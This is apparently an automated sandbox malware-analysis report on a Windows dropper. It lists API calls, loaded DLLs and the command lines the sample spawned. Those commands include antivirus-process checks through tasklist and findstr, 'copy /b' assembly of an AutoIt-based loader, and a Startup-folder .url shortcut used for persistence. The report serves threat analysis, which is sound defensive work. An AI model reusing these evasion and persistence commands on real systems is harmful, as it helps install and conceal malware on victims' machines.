Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E74830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00E74830
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00954830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00954830
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E74632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00E74632
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E8D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00E8D164
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0096D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_0096D164

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E642D5: CreateFileW,DeviceIoControl,CloseHandle,10_2_00E642D5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E58F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00E58F2E
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E65778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00E65778
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00945778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_00945778
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_0040497C0_2_0040497C
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_00406ED20_2_00406ED2
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_004074BB0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E0B02010_2_00E0B020
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E094E010_2_00E094E0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E09C8010_2_00E09C80
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E223F510_2_00E223F5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E8840010_2_00E88400
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E3650210_2_00E36502
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E0E6F010_2_00E0E6F0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E3265E10_2_00E3265E
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E2282A10_2_00E2282A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E389BF10_2_00E389BF
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E36A7410_2_00E36A74
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E80A3A10_2_00E80A3A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E10BE010_2_00E10BE0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E5EDB210_2_00E5EDB2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E2CD5110_2_00E2CD51
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E80EB710_2_00E80EB7
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E68E4410_2_00E68E44
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E36FE610_2_00E36FE6
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E233B710_2_00E233B7
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E1D45D10_2_00E1D45D
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E2F40910_2_00E2F409
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E0F6A010_2_00E0F6A0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E216B410_2_00E216B4
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E0166310_2_00E01663
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E1F62810_2_00E1F628
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E278C310_2_00E278C3
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E2DBA510_2_00E2DBA5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E21BA810_2_00E21BA8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E39CE510_2_00E39CE5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E1DD2810_2_00E1DD28
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E21FC010_2_00E21FC0
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E2BFD610_2_00E2BFD6
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_008EB02016_2_008EB020
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_008E94E016_2_008E94E0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_008E9C8016_2_008E9C80
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_009023F516_2_009023F5
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0096840016_2_00968400
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0091650216_2_00916502
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_008EE6F016_2_008EE6F0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0091265E16_2_0091265E
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0090282A16_2_0090282A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_009189BF16_2_009189BF
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00960A3A16_2_00960A3A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00916A7416_2_00916A74
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_008F0BE016_2_008F0BE0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0093EDB216_2_0093EDB2
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0090CD5116_2_0090CD51
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00960EB716_2_00960EB7
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00948E4416_2_00948E44
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00916FE616_2_00916FE6
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_009033B716_2_009033B7
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0090F40916_2_0090F409
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_008FD45D16_2_008FD45D
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_009016B416_2_009016B4
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_008EF6A016_2_008EF6A0
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_008FF62816_2_008FF628
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_008E166316_2_008E1663
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_009078C316_2_009078C3
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0090DBA516_2_0090DBA5
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00901BA816_2_00901BA8
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00919CE516_2_00919CE5
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_008FDD2816_2_008FDD28
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0090BFD616_2_0090BFD6
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00901FC016_2_00901FC0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: String function: 00908B30 appears 42 times
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: String function: 008F1A36 appears 34 times
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: String function: 00900D17 appears 70 times
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: String function: 004062A3 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: String function: 00E28B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: String function: 00E20D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: String function: 00E11A36 appears 34 times
Source: cW5i0RdQ4L.exeStatic PE information: invalid certificate
Source: cW5i0RdQ4L.exe, 00000000.00000003.1718798181.0000000000644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs cW5i0RdQ4L.exe
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs cW5i0RdQ4L.exe
Source: cW5i0RdQ4L.exe, 00000000.00000002.1719275870.0000000000644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs cW5i0RdQ4L.exe
Source: cW5i0RdQ4L.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: cW5i0RdQ4L.exeStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: classification engineClassification label: mal96.expl.evad.winEXE@28/18@3/1
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6A6AD GetLastError,FormatMessageW,10_2_00E6A6AD
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E58DE9 AdjustTokenPrivileges,CloseHandle,10_2_00E58DE9
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E59399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00E59399
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00938DE9 AdjustTokenPrivileges,CloseHandle,16_2_00938DE9
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00939399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_00939399
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E64148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00E64148
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E6443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,10_2_00E6443D
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifFile created: C:\Users\user\AppData\Local\GuardianCrypto Systems IncJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeFile created: C:\Users\user\AppData\Local\Temp\nsk814.tmpJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat
Source: cW5i0RdQ4L.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: cW5i0RdQ4L.exeVirustotal: Detection: 13%
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeFile read: C:\Users\user\Desktop\cW5i0RdQ4L.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\cW5i0RdQ4L.exe "C:\Users\user\Desktop\cW5i0RdQ4L.exe"
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif n
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & echo URL="C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js"
Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal nJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif nJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & echo URL="C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
